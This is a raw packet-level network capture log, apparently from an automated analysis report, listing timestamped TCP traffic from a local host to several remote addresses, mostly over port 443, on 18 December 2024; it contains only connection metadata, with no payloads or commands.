                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.098942995 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.099014997 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.099031925 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.105876923 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.105958939 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.105974913 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.143162012 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.152424097 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.184433937 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.184446096 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.208508015 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.211093903 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.211170912 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.211227894 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.217206955 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.217289925 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.217309952 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.218164921 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.218230963 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.218252897 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.221919060 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.222037077 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.222060919 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.225747108 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.225814104 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.225851059 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.234528065 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.234622002 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.234641075 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.234708071 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.235624075 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.235687971 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.235707045 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.236936092 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.236954927 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.236999035 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.242166996 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.242232084 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.242247105 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.248409033 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.248430967 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.248473883 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.248498917 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.248526096 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.250298023 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.250361919 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.250376940 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.253079891 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.253153086 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.253168106 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.253226995 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.258685112 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.258744001 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.258759975 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.261785984 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.261804104 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.261853933 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.267410994 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.267472029 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.267487049 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.270109892 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.270180941 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.270204067 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.270265102 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.274152040 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.274234056 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.274250984 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.278820992 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.278898001 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.283577919 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.283675909 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.288317919 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.288372040 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.288378000 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.291687965 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.291769028 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.294893026 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.294945002 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.294950962 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.296574116 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.296643972 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.301301003 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.301351070 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.301357031 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.305032015 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.305109024 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.308295965 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.308366060 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.308382034 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.359447002 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.402532101 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.402748108 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.407260895 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.410018921 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.410100937 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.411355972 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.411434889 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.411452055 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.414038897 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.414114952 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.418545961 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.418601036 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.418615103 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.421127081 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.421197891 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.421226978 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.421299934 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.421334028 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.431014061 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.431075096 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.431087971 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.431138992 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.437885046 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.437894106 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.437983036 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.443990946 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.444044113 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.457103968 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.457117081 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.457227945 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.463965893 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.463973045 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.464042902 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.473313093 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.473320007 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.473381996 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.482346058 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.482419968 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.491653919 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.491727114 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.496742964 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.496798038 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.506027937 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.506100893 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.510765076 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.510821104 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.520134926 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.520209074 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.529133081 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.529198885 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.536530018 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.536602974 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.599159956 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.599231005 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.606489897 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.606561899 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.614764929 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.614828110 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.619255066 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.619328022 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.627058983 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.627125978 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.631486893 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.631561995 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.639837027 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.639904976 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.647351027 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.647423029 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.651655912 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.651724100 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.654908895 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.654980898 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.654987097 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.655003071 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.655038118 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.655059099 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.655102968 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.655112982 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.657857895 CET49723443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.657905102 CET44349723104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.657977104 CET49723443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.658178091 CET49723443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.658193111 CET44349723104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.876133919 CET49724443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.876177073 CET44349724104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.876255989 CET49724443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.876491070 CET49724443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.876507044 CET44349724104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:54.283503056 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:54.871056080 CET44349723104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:54.871331930 CET49723443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:54.871345997 CET44349723104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:54.871676922 CET44349723104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:54.872616053 CET49723443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:54.872675896 CET44349723104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:54.872812033 CET49723443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:54.915360928 CET44349723104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:54.917476892 CET49723443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.093854904 CET44349724104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.100148916 CET49724443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.100173950 CET44349724104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.100888968 CET44349724104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.105019093 CET49724443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.105019093 CET49724443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.105036974 CET44349724104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.105214119 CET44349724104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.161215067 CET49724443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.318332911 CET44349723104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.318514109 CET44349723104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.318584919 CET49723443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.319139957 CET49723443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.319163084 CET44349723104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.547076941 CET44349724104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.547169924 CET44349724104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.547276974 CET49724443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.547817945 CET49724443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.547832012 CET44349724104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.550986052 CET49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.551023960 CET44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.551170111 CET49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.551337957 CET49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.551347017 CET44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.816776037 CET49726443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.816817045 CET44349726104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.816879988 CET49726443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.817102909 CET49726443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:55.817116022 CET44349726104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:56.230842113 CET44349711142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:56.230926991 CET44349711142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:56.231060028 CET49711443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:56.242997885 CET49711443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:56.243043900 CET44349711142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:56.762756109 CET44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:56.763113022 CET49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:56.763130903 CET44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:56.763605118 CET44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:56.764004946 CET49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:56.764004946 CET49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:56.764095068 CET44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:56.814580917 CET49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.035742044 CET44349726104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.036171913 CET49726443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.036196947 CET44349726104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.037323952 CET44349726104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.037664890 CET49726443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.037749052 CET44349726104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.037812948 CET49726443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.079370975 CET44349726104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.206286907 CET44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.206379890 CET44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.206445932 CET49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.207372904 CET49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.207387924 CET44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.307476997 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.631702900 CET44349726104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.631848097 CET44349726104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.631913900 CET49726443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.631934881 CET44349726104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.631973982 CET44349726104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.632019997 CET49726443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.632509947 CET49726443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:57.632525921 CET44349726104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:58.010111094 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:58.010153055 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:58.010251999 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:58.010504961 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:58.010520935 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.228353024 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.228657007 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.228677034 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.229814053 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.230130911 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.230262041 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.230269909 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.230309010 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.230324984 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.230355978 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.230427980 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.230504036 CET49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.230573893 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.838217974 CET44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.838927984 CET44349727104.18.95.41192.168.2.16
